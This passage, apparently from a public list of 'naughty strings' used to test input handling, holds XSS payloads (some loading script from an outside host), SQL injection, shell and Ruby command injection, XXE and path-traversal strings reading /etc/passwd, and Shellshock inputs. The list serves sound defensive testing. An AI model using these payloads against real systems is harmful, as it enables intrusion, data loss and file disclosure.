|  | <img src=x onerror=\x10"javascript:alert(1)"> | 
|  | <img src=x onerror=\x11"javascript:alert(1)"> | 
|  | <img src=x onerror=\x12"javascript:alert(1)"> | 
|  | <img src=x onerror=\x32"javascript:alert(1)"> | 
|  | <img src=x onerror=\x00"javascript:alert(1)"> | 
|  | <a href=javascript:javascript:alert(1)>XXX</a> | 
|  | <img src="x` `<script>javascript:alert(1)</script>"` `> | 
|  | <img src onerror /" '"= alt=javascript:alert(1)//"> | 
|  | <title onpropertychange=javascript:alert(1)></title><title title=> | 
|  | <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> | 
|  | <!--[if]><script>javascript:alert(1)</script --> | 
|  | <!--[if<img src=x onerror=javascript:alert(1)//]> --> | 
|  | <script src="/\%(jscript)s"></script> | 
|  | <script src="\\%(jscript)s"></script> | 
|  | <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | 
|  | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | 
|  | <IMG SRC=# onmouseover="alert('xxs')"> | 
|  | <IMG SRC= onmouseover="alert('xxs')"> | 
|  | <IMG onmouseover="alert('xxs')"> | 
|  | <IMG SRC=javascript:alert('XSS')> | 
|  | <IMG SRC=javascript:alert('XSS')> | 
|  | <IMG SRC=javascript:alert('XSS')> | 
|  | <IMG SRC="jav   ascript:alert('XSS');"> | 
|  | <IMG SRC="jav	ascript:alert('XSS');"> | 
|  | <IMG SRC="jav
ascript:alert('XSS');"> | 
|  | <IMG SRC="jav
ascript:alert('XSS');"> | 
|  | perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | 
|  | <IMG SRC="   javascript:alert('XSS');"> | 
|  | <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | 
|  | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | 
|  | <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | 
|  | <<SCRIPT>alert("XSS");//<</SCRIPT> | 
|  | <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | 
|  | <SCRIPT SRC=//ha.ckers.org/.j> | 
|  | <IMG SRC="javascript:alert('XSS')" | 
|  | <iframe src=http://ha.ckers.org/scriptlet.html < | 
|  | \";alert('XSS');// | 
|  | <u oncopy=alert()> Copy me</u> | 
|  | <i onwheel=alert(1)> Scroll over me </i> | 
|  | <plaintext> | 
|  | http://a/%%30%30 | 
|  | </textarea><script>alert(123)</script> | 
|  |  | 
|  | #	SQL Injection | 
|  | # | 
|  | #	Strings which can cause a SQL injection if inputs are not sanitized | 
|  |  | 
|  | 1;DROP TABLE users | 
|  | 1'; DROP TABLE users-- 1 | 
|  | ' OR 1=1 -- 1 | 
|  | ' OR '1'='1 | 
|  |  | 
|  | % | 
|  | _ | 
|  |  | 
|  | #	Server Code Injection | 
|  | # | 
|  | #	Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) | 
|  |  | 
|  | - | 
|  | -- | 
|  | --version | 
|  | --help | 
|  | $USER | 
|  | /dev/null; touch /tmp/blns.fail ; echo | 
|  | `touch /tmp/blns.fail` | 
|  | $(touch /tmp/blns.fail) | 
|  | @{[system "touch /tmp/blns.fail"]} | 
|  |  | 
|  | #	Command Injection (Ruby) | 
|  | # | 
|  | #	Strings which can call system commands within Ruby/Rails applications | 
|  |  | 
|  | eval("puts 'hello world'") | 
|  | System("ls -al /") | 
|  | `ls -al /` | 
|  | Kernel.exec("ls -al /") | 
|  | Kernel.exit(1) | 
|  | %x('ls -al /') | 
|  |  | 
|  | #      XXE Injection (XML) | 
|  | # | 
|  | #	String which can reveal system files when parsed by a badly configured XML parser | 
|  |  | 
|  | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> | 
|  |  | 
|  | #	Unwanted Interpolation | 
|  | # | 
|  | #	Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. | 
|  |  | 
|  | $HOME | 
|  | $ENV{'HOME'} | 
|  | %d | 
|  | %s | 
|  | {0} | 
|  | %*.*s | 
|  | File:/// | 
|  |  | 
|  | #	File Inclusion | 
|  | # | 
|  | #	Strings which can cause user to pull in files that should not be a part of a web server | 
|  |  | 
|  | ../../../../../../../../../../../etc/passwd%00 | 
|  | ../../../../../../../../../../../etc/hosts | 
|  |  | 
|  | #	Known CVEs and Vulnerabilities | 
|  | # | 
|  | #	Strings that test for known vulnerabilities | 
|  |  | 
|  | () { 0; }; touch /tmp/blns.shellshock1.fail; | 
|  | () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } | 
|  | <<< %s(un='%s') = %u | 
|  | +++ATH0 | 
|  |  | 
|  | #	MSDOS/Windows Special Filenames | 
|  | # | 
|  | #	Strings which are reserved characters in MSDOS/Windows | 
|  |  | 
|  | CON | 
|  | PRN | 
|  | AUX | 
|  | CLOCK$ | 
|  | NUL | 
|  | A: | 
|  | ZZ: | 
|  | COM1 | 
|  | LPT1 | 
|  | LPT2 | 
|  | LPT3 | 
|  | COM2 | 
|  | COM3 | 
|  | COM4 | 
|  |  | 
|  | #   IRC specific strings | 
|  | # | 
|  | #   Strings that may occur on IRC clients that make security products freak out | 
|  |  | 
|  | DCC SEND STARTKEYLOGGER 0 0 0 | 
|  |  | 
|  | #	Scunthorpe Problem | 
|  | # | 
|  | #	Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) | 
|  |  | 
|  | Scunthorpe General Hospital | 
|  | Penistone Community Church | 
|  | Lightwater Country Park | 
|  | Jimmy Clitheroe | 
|  | Horniman Museum | 
|  | shitake mushrooms | 
|  | RomansInSussex.co.uk | 
|  | http://www.cum.qc.ca/ | 
|  | Craig Cockburn, Software Specialist | 
|  | Linda Callahan | 
|  | Dr. Herman I. Libshitz | 
|  | magna cum laude | 
|  | Super Bowl XXX | 
|  | medieval erection of parapets | 
|  | evaluate | 
|  | mocha | 
|  | expression | 
|  | Arsenal canal | 
|  | classic | 
|  | Tyson Gay | 
|  | Dick Van Dyke | 
|  | basement | 
|  |  | 
|  | #	Human injection | 
|  | # | 
|  | #	Strings which may cause human to reinterpret worldview | 
|  |  | 
|  | If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. | 
|  |  | 
|  | #	Terminal escape codes | 
|  | # | 
|  | #	Strings which punish the fools who use cat/type on this file | 
|  |  | 
|  | Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue | 
|  | But now...[20Cfor my greatest trick...[8m | 
|  | The quick brown fox... [Beeeep] | 
|  |  | 
|  | #	iOS Vulnerabilities | 
|  | # | 
|  | #	Strings which crashed iMessage in various versions of iOS | 
|  |  | 
|  | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 | 
|  | 🏳0🌈️ |